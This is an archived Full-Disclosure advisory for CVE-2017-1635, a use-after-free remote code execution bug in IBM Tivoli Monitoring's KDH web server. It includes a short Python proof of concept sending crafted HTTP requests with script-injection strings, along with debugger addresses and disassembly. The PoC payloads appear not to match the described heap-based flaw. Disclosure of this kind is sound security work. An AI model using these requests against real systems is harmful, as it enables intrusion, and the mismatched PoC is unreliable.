lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 6 Feb 2018 12:11:52 +0100
From: p@...ntumleap.it
To: fulldisclosure@...lists.org
Subject: [FD] IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution
 Vulnerability

IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability

CVEID: CVE-2017-1635
CVSS Base Score: 8
Affected Products and Versions
The KDH component of IBM Tivoli Monitoring Basic Services (KGL,KAX) for
Version 6.2.2 through 6.2.2 Fix Pack 9


A vulnerability exists in the internal web server provided by IBM Tivoli
Monitoring basic services. It could allow a remote attacker to execute
arbitrary code on the system, caused by a use-after-free error. A remote
attacker could exploit this vulnerability to execute arbitrary code on
the system or cause the application to crash.
The web server component "KDH", after receiving certain requests,
executes a memory region in the heap previously freed by the component
itself.
An attacker is able to fill the heap before the memory is reused, in
order to execute arbitrary code.

poc.py
………………………………

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("localhost",1920))

payload = 'GET
/index.php?action=storenew&username=<script>alert()</script>index.php?action=storenew&username=<script>alert()</script>
HTTP/1.1\r\n\r\n'
s.send(payload)

payload = 'GET
/index.php?action=search&searchFor=\"><script>alert()</script >
HTTP/1.1\r\n\r\n'
s.send(payload)
print s.recv(1024)
………………………………

0x6191BCF8 - malloc in BSS1_NewFormat
0x61903fea - free in BSS1_EndFormat
0x6191BDEF - call to ecx+4

At first, malloc() is called to allocate space (0x400) where application
will put response page to the faulty request; then free() is called on
the same address used in the “call [ecx+4]” later on.

The disassembly code involved is:
kbb.dll:61903FD7                 mov     eax, [edx]
kbb.dll:61903FD9                 push    eax
kbb.dll:61903FDA                 mov     ecx, [ebp-8]
kbb.dll:61903FDD                 call    dword ptr [ecx+4] <- here is
called the address of the previously freed heap + 4

Supporting techincal details:
As shown in the WinDbg screenshot
(http://www.quantumleap.it/wp-content/uploads/2018/02/tivoli_windbg.jpeg),
execution is suspended at 0x004c0931, where the payload is “\xcc” -
breakpoint.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ